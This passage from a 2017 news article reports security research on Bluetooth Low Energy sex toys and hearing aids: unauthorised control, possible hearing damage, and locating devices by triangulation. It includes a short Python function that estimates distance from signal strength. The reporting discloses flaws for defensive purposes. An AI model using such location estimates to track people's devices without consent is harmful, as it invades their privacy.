PTP concludes that it has identified a legitimate privacy issue which deserves public attention and red faces all round. “Having an adult toy unexpectedly start vibrating could cause a great deal of embarrassment in some situations.”

The issue goes beyond the niche technology of internet-enabled sex toys. The latest versions of some hearing aids also support BLE. One such device was used by the father of a PTP researcher.

“I managed to find them broadcasting whilst we were having lunch one day,” PTP researcher Alex Lomas wrote. “They have BLE in them to allow you to play back music, but also control and adjust their settings (like if you’re in a noisy restaurant or a concert hall). These things cost £3,500 and need to be programmed by an audiologist so not only could an attacker damage or deprive someone of their hearing, but it’s going to cost them to get it fixed.”

PTP’s research on BLE device insecurity – together with recommendations on how to shore them up – can be found here.

BLE advertises its presence. As a result, these toys can be located fairly accurately using triangulation. The potential privacy issues this throws up might be mitigated by using a generic BLE device name for, ahem, adult toys and other kit people might not necessarily want world+dog to stumble on.
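Triangulation here amounts to combining rough range estimates from several listening posts, each derived from received signal strength. A common back-of-the-envelope range estimate uses the log-distance path-loss model – a sketch, with illustrative calibration values (the -59 dBm one-metre reference and the path-loss exponent are assumptions, not measurements):

```python
def estimate_distance_m(rssi_dbm: float, tx_power_dbm: float = -59.0,
                        path_loss_exponent: float = 2.0) -> float:
    """Crude range estimate from signal strength via the log-distance
    path-loss model: d = 10 ** ((txPower - RSSI) / (10 * n)).
    tx_power_dbm is the calibrated RSSI at 1 m; the exponent n depends
    on the environment (roughly 2 in free space, higher indoors)."""
    return 10 ** ((tx_power_dbm - rssi_dbm) / (10 * path_loss_exponent))

print(round(estimate_distance_m(-59.0), 1))  # 1.0  (at the 1 m reference)
print(round(estimate_distance_m(-79.0), 1))  # 10.0 (20 dB weaker, ~10x farther)
```

With ranges from three or more sniffers at known positions, intersecting the resulting circles pins the device down – which is exactly the privacy worry a generic device name would blunt.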

In some ways the development of Bluetooth technology is making the risk more severe.

The specification for Bluetooth 4.0 allows only one master-slave connection at a time, so a device can’t be hijacked once it is paired with a smartphone. However, Bluetooth 4.2 changes this: slaves are permitted physical links to more than one master at a time, opening the door for rogue devices to talk to and control already-paired kit. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/09/29/ble_exploits_screwdriving/